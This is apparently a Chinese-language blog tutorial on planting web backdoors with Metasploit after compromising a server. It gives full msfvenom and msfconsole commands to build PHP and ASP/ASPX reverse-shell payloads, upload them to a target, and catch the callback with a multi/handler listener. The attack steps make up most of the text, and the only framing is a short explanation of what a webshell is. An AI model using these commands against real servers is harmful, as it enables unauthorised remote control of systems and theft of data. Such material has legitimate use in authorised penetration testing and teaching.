Metasploit(后渗透攻击:web后门)

web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。

1.meterpreter后门

   在metasploit中,有一个名为php meterpreter的payload,利用这个模块可创建具有meterpreter功能的 php webshell 。在攻击中使用metasploit php shell 的步骤如下所示:

  • 使用msfvenom创建一个webshell.php
  • 上传webshell.php到目标服务器
  • 运行metasploit multi-handler开始监听
  • 访问webshell.php页面
  • 获得反弹的metasploit shell 

以下是通过webshell拿网站的大致流程:


msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.1 lport=4444 -f raw >1.
php (通过msfvenom工具制作php meterpreter)

然后将1.php上传到目标服务器上,接着启动msfconsole,使用以下命令设置监听。

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.100   (自己的攻击机IP地址)
run    (运行)

接着在网站上访问那个1.php的文件,回到msf下面,可以看见服务端已经反弹成功了。

最后使用sysinfo和getuid等meterpreter命令渗透目标主机。


2.aspx meterpreter后门

本节要介绍的是metasploit下名为shell_reverse_tcp的payload,利用这个模块可创建具有meterpreter功能的各版本shell code。

在攻击中使用aspx meterpreter后门的步骤和metasploit php shell 的大概相同。首先使用下列代码调用该模块,并设置相关参数

use windows/shell_reverse_tcp     (使用该payload)
info  
set lhost 192.168.1.100
set lport 4444
save   保存

生成各版本shellcode的命令如下:
generate -t asp        //生成asp版的shellcode
generate -t aspx       //生成aspx版的shellcode

在这里我们生成一个asp版的webshell。

Metasploit(后渗透攻击:web后门)_第1张图片

我们把内容保存为asp.asp,在上传到目标服务器。

接着启动msfconsole,使用以下命令设置监听。


use  exploit/multi/handler

set   payload windows/meterpreter/reverse_tcp

set  lhost 192.168.1.100

set  lport 4444

run


接着在网站上访问那个asp.asp的文件,回到msf下面,可以看见服务端已经反弹成功了。

你可能感兴趣的:(Metasploit)